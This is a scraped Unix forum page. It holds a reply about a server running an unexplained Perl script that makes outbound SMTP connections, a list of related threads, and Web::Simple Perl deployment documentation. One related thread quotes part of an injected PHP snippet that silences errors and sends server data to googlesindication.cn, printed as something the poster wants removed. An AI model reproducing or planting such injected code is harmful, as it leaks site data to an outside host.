02-24-2017
Hi,
I suspect these are two different issues. So far you have seen evidence of attempted brute-forcing of your WordPress logins, and you also saw a Perl script establishing a variety of outbound SMTP connections back at the very start of this thread.
It is entirely possible that the two are related, but equally they may not be. There's always a steady trickle of would-be brute-forcing and exploit scanning in the logs of pretty much every Web server on the Internet, more or less. If your WordPress installation is genuinely secure, these should be nothing to worry about. More sinister is the Perl script.
If in the output of ps and top right now you're not able to see any errant Perl scripts, and if there is nothing Perl-related in any of your Web logs, then there's not much more you can do at this point to track down that Perl script.
What you can say for sure is that your server was clearly running an unexpected Perl script that appeared to be establishing a variety of outbound SMTP connections, and it must have come from somewhere. And if that somewhere wasn't you, then you do definitely have a security issue you still need to get to the bottom of.
7 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies
2. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
3. Cybersecurity
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
CSI:Internet - Alarm at the pizza service
CSI:Internet - The image of death
CSI:Internet - PDF timebomb
CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies
4. Shell Programming and Scripting
I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard.
From parent.pl
$input1=123;
$input2=abc;
I tried calling it with
system("/usr/bin/perl child.pl $input1 $input2");
and
`perl... (1 Reply)
Discussion started by: grajp002
1 Replies
5. Shell Programming and Scripting
Hi All,
I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ??
print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">");
print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies
6. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
7. Programming
I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open())
I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies
LEARN ABOUT DEBIAN
web::simple::deployment
Web::Simple::Deployment(3pm) User Contributed Perl Documentation Web::Simple::Deployment(3pm)
NAME
Web::Simple::Deployment - various deployment options
DESCRIPTION
This file documents common deployment methods for Web::Simple. If you feel one is missing, please ask in the IRC channel and we'll work
with you to add it.
CGI
The most basic deployment option is as a CGI script loading and running your Web::Simple-module:
#!/usr/bin/env perl
use Your::Web::Simple::App;
Your::Web::Simple::App->run_if_script;
Save that as script.cgi and your web server will handle it correctly.
Plack-Server
This works in with exactly the same code as CGI deployment. However instead of letting your web server load script.cgi, you run this on the
command line:
plackup script.cgi
Self-contained CGI
Sometimes your app is so small that you have only one or two tiny classes that you want to run as a CGI script. Web::Simple offers a
helpful mechanism to achieve that.
#!/usr/bin/env perl
use Web::Simple 'HelloWorld'; # enables strictures and warnings for the file
# additionally, HelloWorld is upgraded to a
# Web::Simple application
{
package HelloWorld;
sub dispatch_request {
sub (GET) {
[
200,
[ 'Content-type', 'text/plain' ],
[ 'Hello world! It is a fine ' . HelloWorld::Helper->day ]
]
},
sub () {
[ 405, [ 'Content-type', 'text/plain' ], [ 'Method not allowed' ] ]
}
}
}
{
package HelloWorld::Helper;
use DateTime;
sub day {
return DateTime->now->day_name;
}
}
HelloWorld->run_if_script;
AUTHORS
See Web::Simple for authors.
COPYRIGHT AND LICENSE
See Web::Simple for the copyright and license.
perl v5.14.2 2012-05-07 Web::Simple::Deployment(3pm)